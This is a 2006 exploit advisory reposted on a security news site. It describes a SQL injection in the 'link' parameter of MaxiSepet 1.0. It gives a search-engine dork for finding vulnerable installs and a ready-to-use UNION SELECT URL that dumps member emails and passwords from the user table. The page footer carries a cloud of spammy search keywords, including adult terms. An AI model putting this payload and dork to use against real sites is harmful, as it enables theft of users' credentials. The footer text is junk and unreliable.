about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , MaxiSepet <= 1.0 (link) SQL Injection Vulnerability



2006-06-11 MaxiSepet <= 1.0 (link) SQL Injection Vulnerability
Rated as : High Risk

#Method found by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=42
#Title: MaxiSepet <= 1.0 (link) SQL Injection Vulnerability.

#Dork: "Copyright MaxiSepet �"

#How: Parameter link did not sanitized properly.

#Example: GET ->
http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=SQL

#Example: GET ->
http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('�ye%20adi:%20<b>',email,'</b><br>','�ifre:%20<b>',sifre,'</b>')+from+uye+ORDER
BY email ASC

# nukedx.com [2006-06-11]
securitydot.net - 2006-06-11

Advertising

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 16:52:16 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.Dogsex www.23sex. SSH-1.99-O phpBB port php -nuke www.arabtv t796t www.120sex viewscreen Joom+Fish SExy video sexgirl pi SExy video indian ido dotproject Www wabtri Night clab www.Sex45. CMS is Fre 200 /compo CVE-2007-3 php-nuke+a fanmaza www.bigwet Saniosex www.am.kom 2.6.9-34. cat /etc// PHP &a Hot sex gi sex gierls Sania sexy www.hotsex news for 2 nangidiyam 200 /compo www.avizon www.avizon t211t sex inject sasassasas www.hotsex adult vidi t211t 12http:// indian hot WWW.700.CO tom fooley svg+enabla Www.phoner